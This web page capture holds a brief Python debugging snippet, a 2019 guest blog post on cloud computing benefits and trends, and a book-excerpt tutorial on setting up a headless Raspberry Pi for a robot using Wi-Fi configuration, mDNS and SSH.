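for full_name in names:
    # Stop only for the suspicious entry, skipping the rest
    if "O'Carroll" in full_name:
        breakpoint()  # inspect full_name in pdb, then continue with c or quit with q
    first_name, last_name = full_name.rsplit(maxsplit=1)
    print(f'{last_name}, {first_name}')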

Cloud computing trends in 2019

Guest Contributor
07 Jan 2019
8 min read
Cloud computing is a rapidly growing technology that many organizations are adopting to enable their digital transformation. As per the latest Gartner report, the cloud tech services market is projected to grow 17.3% ($206 billion) in 2019, up from $175.8 billion in 2018 and by 2022, 90% of organizations will be using cloud services. In today’s world, Cloud technology is a trending buzzword among business environments. It provides exciting new opportunities for businesses to compete on a global scale and is redefining the way we do business. It enables a user to store and share data like applications, files, and more to remote locations. These features have been realized by all business owners, from startup to well-established organizations, and they have already started using cloud computing. How Cloud technology helps businesses Reduced Cost One of the most obvious advantages small businesses can get by shifting to the cloud is saving money. It can provide small business with services at affordable and scalable prices. Virtualization expands the value of physical equipment, which means companies can achieve more with less. Therefore, an organization can see a significant decline in power consumption, rack space, IT requirements, and more. As a result, there is lower maintenance, installation, hardware, support & upgrade costs. For small businesses, particularly, those savings are essential. Enhanced Flexibility Cloud can access data and related files from any location and from any device at any time with an internet connection. As the working process is changing to flexible and remote working, it is essential to provide work-related data access to employees, even when they are not at a workplace. Cloud computing not only helps employees to work outside of the office premises but also allows employers to manage their business as and when required. Also, enhanced flexibility & mobility in cloud technology can lead to additional cost savings. For example, an employer can select to execute BYOD (bring your own device). Therefore, employees can bring and work on their own devices which they are comfortable in.. Secured Data Improved data security is another asset of cloud computing. With traditional data storage systems, the data can be easily stolen or damaged. There can also be more chances for serious cyber attacks like viruses, malware, and hacking. Human errors and power outages can also affect data security. However, if you use cloud computing, you will get the advantages of improved data security. In the cloud, the data is protected in various ways such as anti-virus, encryption methods, and many more. Additionally, to reduce the chance of data loss, the cloud services help you to remain in compliance with HIPAA, PCI, and other regulations. Effective Collaboration Effective collaboration is possible through the cloud which helps small businesses to track and oversee workflow and progress for effective results. There are many cloud collaboration tools available in the market such as Google Drive, Salesforce, Basecamp, Hive, etc. These tools allow users to create, edit, save and share documents for workplace collaboration. A user can also constrain the access of these materials. Greater Integration Cloud-based business solutions can create various simplified integration opportunities with numerous cloud-based providers. They can also get benefits of specialized services that integrate with back-office operations such as HR, accounting, and marketing. 
This type of integration lets business owners concentrate on the core areas of the business.

Scalability
One of the great aspects of cloud-based services is their scalability. A small business may currently require limited storage, mobility, and so on, but its needs and requirements will grow significantly as the business grows, and that growth does not always occur linearly. Cloud-based solutions can accommodate sudden increases in an organization's requirements: they have the flexibility to scale up or scale down, ensuring that your requirements are served within your budget plans.

Cloud Computing Trends in 2019

Hybrid & Multi-Cloud Solutions
Hybrid cloud is set to become the dominant business model. The public cloud is not a good fit for every type of solution, and shifting everything to the cloud can be difficult for organizations with specific requirements. The hybrid cloud model offers a transition path that blends existing on-premises infrastructure with public and private cloud services, so organizations can move to the cloud at their own pace while remaining effective and flexible.

Multi-cloud is the next step in the cloud evolution. It enables users to control and run an application, workload, or data on any cloud (private, public, or hybrid) based on their technical requirements. A company can therefore have multiple public, private, or hybrid clouds, connected together or not. Expect multi-cloud strategies to dominate in the coming days.

Backup and Disaster Recovery
According to a Spiceworks report, 15% of the cloud budget is allocated to Backup and Disaster Recovery (DR) solutions, the highest single allocation, followed by email hosting and productivity tools. This reflects the shared responsibility model that public cloud providers operate on: providers such as AWS (Amazon Web Services), Microsoft Azure, and Google Cloud are responsible for the availability of backup and DR services and the security of the infrastructure, while users are responsible for their own data protection and compliance.

Serverless Computing
Serverless computing is gaining popularity and will continue to do so in 2019. With serverless, users request a platform as a service (PaaS) and the cloud provider charges only for what is used. Customers do not need to buy or rent servers in advance, nor configure them; the cloud provider supplies the platform, its configuration, and a wide range of tools for designing applications and working with data.

Data Containers
Using data containers will become easier in 2019. Containers are popular for transferring data: they store and organize virtual objects and resolve the issue of having software run reliably when it is moved from one system to another. There are some limitations, however: while containers are used for transport, they can only run on servers with compatible operating system kernels.
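As a minimal sketch of the container idea described above, the following shell commands use Docker, one popular container tool; the image name myapp is a placeholder, and a Dockerfile is assumed to exist in the current directory. The image is built on one machine, exported to a single archive, then loaded and run on a second machine with a compatible kernel:

# on the first machine: build an image from the Dockerfile in the current directory
docker build -t myapp .
# export the image to a single archive file that can be copied anywhere
docker save -o myapp.tar myapp

# on the second machine: load the archive and run the container
docker load -i myapp.tar
docker run --rm myapp

This is only an illustration of how containers make software portable between systems; the exact tooling and image contents will depend on your application.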
Artificial Intelligence Platforms
Using AI to process big data is one of the most important advances in collecting business intelligence and gaining a better understanding of how a business functions. An AI platform supports a faster, more effective, and more efficient way of working with data scientists and other team members. It can also help reduce costs in a variety of ways, such as automating simple tasks, preventing duplication of effort, and taking over expensive labor-intensive work such as copying or extracting data.

Edge computing
Edge computing is a systematic approach to executing data processing at the edge of the network to streamline cloud computing. It is a result of the ever-increasing use of IoT devices. Edge is essential for running real-time services, as it streamlines the flow of traffic from IoT devices and provides real-time analytics, so it is also on the rise in 2019.

Service mesh
A service mesh is a dedicated infrastructure layer for enhancing service-to-service communication across microservice applications. It is a new and emerging class of service management that handles the complexity of inter-microservice communication and provides observability and tracing in a seamless way. As containers become more prevalent for cloud-based application development, the need for service meshes is increasing significantly. Service meshes help manage traffic through service discovery, load balancing, routing, and observability, and they aim to reduce the complexity of containers and improve network functionality.

Cloud Security
With the rise of cloud technology, security is another serious consideration. With the introduction of the GDPR (General Data Protection Regulation), security concerns have become even more pressing. Many businesses shift to cloud computing without seriously considering its security and compliance protocols. GDPR will therefore be an important topic in 2019, and organizations must ensure that their data practices are both safe and compliant.

Conclusion
As discussed above, cloud technology provides better data storage, data security, and collaboration, and it changes workflows to help small business owners make better decisions. Cloud connectivity is ultimately about convenience: streamlining workflows to help any business become more flexible, efficient, productive, and successful. If you want to set your business up for success, this might be the time to transition to cloud-based services.

Author Bio
Amarendra Babu L loves pursuing excellence through writing and has a passion for technology. He is presently working as a content contributor for Mindmajix.com and Tekslate.com. He is a tech geek and loves to explore new opportunities. His work has been published on various sites related to Big Data, Business Analytics & Intelligence, Blockchain, Cloud Computing, Data Science, AI & ML, Project Management, and more. You can reach him at amarendrabl18@gmail.com. He is also available on LinkedIn.

8 programming languages to learn in 2019
18 people in tech every programmer and software engineer need to follow in 2019
We discuss the key trends for web and app developers in 2019 [Podcast]

Setting up a Raspberry Pi for a robot - Headless by Default [Tutorial]

Prasad Ramesh
07 Jan 2019
12 min read
In this tutorial, you will learn why the Raspberry Pi controller on a robot should be wireless, or headless; what headless means; and why it's useful in robotics. You will see how to set up a Raspberry Pi as a headless device from the beginning, how to connect to it once it is on the network, and how to send your first instructions to it. This article is an excerpt from the book Learn Robotics Programming by Danny Staple, in which you'll gain experience of building a next-generation collaboration robot.

What does headless mean and why?
A headless system is a computer designed to be used from another computer over a network, for when keyboard, screen, and mouse access to a device is inconvenient. Headless access is used for server systems and for building robots. Refer to the following diagram:

The preceding diagram shows a system with a head, where a user can sit in front of the device. You would need to take a screen, keyboard, and mouse with your robot, which is not very mobile. You may be able to attach and detach them as required, but this is also inconvenient and adds bulk. There are systems designed to dock with Raspberry Pis like this that are portable, but when a robot moves, you'd need to disconnect or move with the robot. I have seen, at some events, a robot with a tiny screen attached and someone using a wireless keyboard and mouse as an option. However, in this article we are going to focus on using a robot as a headless device. Take a look at the following diagram:

The Raspberry Pi in the preceding diagram is mounted on a robot as a headless device. This Raspberry Pi is connected to batteries and motors, but it is not encumbered by a screen and keyboard; those are handled by another computer. The Pi is connected wirelessly to a network, which could be through a laptop. Code, instructions, and information are sent to and from the Raspberry Pi via this wireless network. To interact with it, you use the screen and keyboard on your laptop. However, you would usually expect your robot to function autonomously, so you would only connect to the Pi to modify things or test code.

As an alternative to bringing a laptop everywhere to control the robot, it can be more convenient to add a few indicator LEDs so you can start and stop autonomous behaviors, view the robot's status, or just drive it without needing to hook up the laptop at all. Most of the time, a screen and keyboard are not required. However, it is worth having them around for the few cases in which you lose contact with the Raspberry Pi and it refuses to respond via the network; you can then connect a screen and keyboard and see what is going on.

For our headless access to the Raspberry Pi, we will be using SSH, a secure shell. SSH gives you a command line for sending instructions to the Pi and a file transfer system for putting files onto it. As SSH connects over a network, we need to configure our Raspberry Pi to connect to your wireless network.

Making a Pi headless leaves it free to roam around. It keeps a robot light, since it does not need to carry or power a screen and keyboard, and it makes the robot smaller, since a screen and keyboard are bulky. It also encourages you, the maker, to think more about autonomous behavior, since you can't always type commands to the robot.

Setting up wireless on the Raspberry Pi and enabling SSH
To make your Raspberry Pi headless, we need to set up Wi-Fi.
First, you will need to insert a MicroSD card prepared with Raspbian into your computer. To prepare your MicroSD card (at least 16 GB), follow these steps:

Go to https://www.raspberrypi.org/software/operating-systems/ and download the ZIP file of Raspbian Lite.
Download Etcher and install it.
Connect your MicroSD card to your computer and select the downloaded Raspbian Lite file. The flash button will be highlighted; press it, and the process should complete in a few minutes.

If you are continuing straight here from Etcher, remove the card and reinsert it so that the computer can recognize the new state of the drive. The card shows up as two disk drives. One of the drives is called boot; this is the only one you can read in Windows. Windows will ask if you want to format one of these disks; click Cancel, because part of the SD card holds a Linux-specific filesystem that is not readable by Windows.

In boot, you'll need to create two files:

ssh: Create this as an empty file with no extension.
wpa_supplicant.conf: This file will contain your Wi-Fi network configuration.

It is important that the ssh file has no extension, so it is not ssh.txt or some other variation. Windows hides extensions by default, so you may need to reveal them: in File Explorer, go to the View tab, look for the Show/Hide pane, and then tick File name extensions. In general, when working with code, having extensions displayed is important, so I recommend leaving this option ticked.

The wpa_supplicant.conf file
The first line you must provide in the wpa_supplicant.conf file is a country code. These are the ISO/IEC alpha-2 country codes, and you should find the appropriate code for the country you are in by going to https://datahub.io/core/country-list. This is important: if the country code is not present, Raspbian will disable the Wi-Fi adapter to prevent it from operating outside the country's legal standard and interfering with, or being interfered with by, other equipment. In my case, I am in Great Britain, so my country code is GB. Let's take a look at the code:

country=GB

Then, add the following lines. update_config means that other tools used later are allowed to update the configuration:

update_config=1
ctrl_interface=/var/run/wpa_supplicant

Now, you can define the Wi-Fi network your robot and Raspberry Pi will connect to:

network={
    ssid="<your network ssid>"
    psk="<your network psk>"
}

Please be sure to specify your own network details instead of the placeholders here. The pre-shared key (PSK) is also known as the Wi-Fi password. These should be the same details you use to connect your laptop or computer to your Wi-Fi network. The completed wpa_supplicant.conf file should look like this:

country=GB
update_config=1
ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="<your network ssid>"
    psk="<your network psk>"
}
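As an aside, if you prefer to create these two files from a terminal rather than a file manager, a minimal sketch follows. The mount point /Volumes/boot is an assumption for macOS; on Linux desktops it is usually something like /media/<user>/boot, and on Windows you would simply use the boot drive letter in File Explorer:

# create the empty ssh file that tells Raspbian to enable the SSH server on boot
touch /Volumes/boot/ssh
# open the Wi-Fi configuration in a text editor and paste in the contents shown above
nano /Volumes/boot/wpa_supplicant.conf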
Ensure you use the menus to eject the MicroSD card so that the files are fully written before removing it. Now, with these two files in place, you can use the MicroSD card to boot the Raspberry Pi. Plug the MicroSD card into the slot on the underside of the Raspberry Pi; the contacts of the card should face the Raspberry Pi, and it will only fit properly in the correct orientation. Plug a Micro-USB cable into the side of the Raspberry Pi and connect it to a power supply. As the technical requirements suggested, the power supply should be able to provide around 2.1 amps. Lights turning on means that the Pi is starting.

Finding your Pi on the network
Assuming your SSID and PSK are correct, your Raspberry Pi will now have registered on your Wi-Fi network. However, you still need to find it. The Raspberry Pi uses dynamic addresses (DHCP), so every time you connect it to your network, it may get a different IP address. Logging in to your router and writing down the IP address can work in the short term, but doing that every time it changes would be quite frustrating.

Luckily, the Raspberry Pi uses a technology known as mDNS to tell nearby computers that it is there. mDNS is the Multicast Domain Name System, which means the Raspberry Pi sends messages to all nearby computers that are listening, saying that its name is raspberrypi.local and giving the address at which to find it. This is also known as Zeroconf and Bonjour. So, the first thing you'll need to do is ensure your computer is able to receive this.

Apple macOS
If you are using an Apple Mac computer, it is already running the Bonjour software, which is mDNS capable.

Microsoft Windows
On Windows, you will need the Bonjour software. If you have already installed a recent version of Skype or iTunes, you will already have it. You can use this guide (https://smallbusiness.chron.com/enable-bonjour-65245.html) to check that it is present and enable it. You can check whether it is already working with the following command in a Command Window:

C:\Users\danny>ping raspberrypi.local

If you see this, you have Bonjour already:

PING raspberrypi.local (192.168.0.53) 56(84) bytes of data.
64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=1 ttl=64 time=0.113 ms
64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=2 ttl=64 time=0.079 ms

If you see this, you'll need to install it:

Ping request could not find host raspberrypi.local. Please check the name and try again.

To do so, browse to the Apple Bonjour for Windows page at https://support.apple.com/downloads/bonjour_for_windows, download Bonjour Print Services for Windows, and install it. Once this has run, Windows will be able to look up mDNS devices by name.

Linux
Ubuntu and Fedora desktop versions have had mDNS compatibility for a long time, and many other recent Linux desktops have it enabled by default. On other desktops, you will need to find the instructions for Zeroconf or Avahi.

Testing the setup
The Raspberry Pi's green light should have stopped blinking, and only a red power light should be visible. In Windows, open a command line by pressing the Windows key and typing CMD; in Linux or macOS, open a Terminal. From this Terminal, we will try to ping the Raspberry Pi, that is, find the Pi on the network and send a small message to elicit a response:

ping raspberrypi.local

If everything has gone right, the computer will show that it has connected to the Pi:

$ ping raspberrypi.local
PING raspberrypi.local (192.168.0.53) 56(84) bytes of data.
64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=1 ttl=64 time=0.113 ms
64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=2 ttl=64 time=0.079 ms
64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=3 ttl=64 time=0.060 ms
64 bytes from 192.168.0.53 (192.168.0.53): icmp_seq=4 ttl=64 time=0.047 ms
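Once the ping succeeds, you can try your first headless connection over SSH. This is only a minimal sketch, assuming the default Raspbian user pi (with the default password raspberry, which you should change) and the default raspberrypi.local hostname; the file robot.py is a hypothetical example:

# open a remote command line on the Pi; accept the host key when prompted
ssh pi@raspberrypi.local
# once logged in, a quick check that you really are on the Pi
uname -a
# from your computer, copy a file (for example, a robot script) to the Pi's home directory
scp robot.py pi@raspberrypi.local:

After the first connection accepts the Pi's host key, you will be at a shell prompt on the robot and can send it instructions without any screen or keyboard attached.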
What if you cannot reach the Raspberry Pi?
If the Raspberry Pi does not appear to be responding to the ping operation, there are some initial steps you can take to diagnose and remedy the situation. If it is already working, skip to the next heading. Refer to the following steps:

First, double-check your connections. You should have seen a few blinks of the green light and a persistent red light. If not, ensure that the SD card is seated firmly and that the power supply can provide 2.1 amps.

Check your Wi-Fi access point's settings with the Pi booted and see whether it has taken an IP address there. If it has an address but raspberrypi.local still cannot be found, Zeroconf/Bonjour may not be running correctly on your computer. If you have not installed it, please go back and do so. If you have, and you are on Windows, note that different versions of Bonjour (Bonjour Print Services, Bonjour from Skype, and Bonjour from iTunes) can conflict if installed together; use the Windows add/remove programs function to see if there is more than one, remove all Bonjour instances, and then install the official one again.

Next, turn the power off, take out the SD card, place it back into your computer, and double-check that the wpa_supplicant.conf file is present and has the right Wi-Fi details and country code. The most common errors in this file are the following:

Incorrect Wi-Fi details
Missing quotes, or missing or incorrect punctuation
An incorrect or missing country code
Parts being in the wrong case

The ssh file is removed when the Pi boots, so if you are certain it was there and it has now been removed, this is a good sign that the Pi actually booted.

Finally, you may need to boot the Pi with a screen and keyboard connected and attempt to diagnose the issue there. The screen will tell you whether there are problems with wpa_supplicant.conf or other issues. It is important to look at the text on the screen and use it to search the web for answers; I cannot reproduce them all here, as there are many kinds of problems that could occur. If you cannot find a solution, I recommend asking on Twitter using the tag #raspberrypi, on Stack Overflow, or in the Raspberry Pi Forums at https://www.raspberrypi.org/forums/.

In this article, we explored what headless, or wireless, means for robots and set up a headless Raspberry Pi. To learn more about building, connecting, and configuring the robot, check out the book Learn Robotics Programming.

Introducing Strato Pi: An industrial Raspberry Pi
Raspberry Pi launches its last board for the foreseeable future: the Raspberry Pi 3 Model A+ available now at $25
Introducing Raspberry Pi TV HAT, a new addon that lets you stream live TV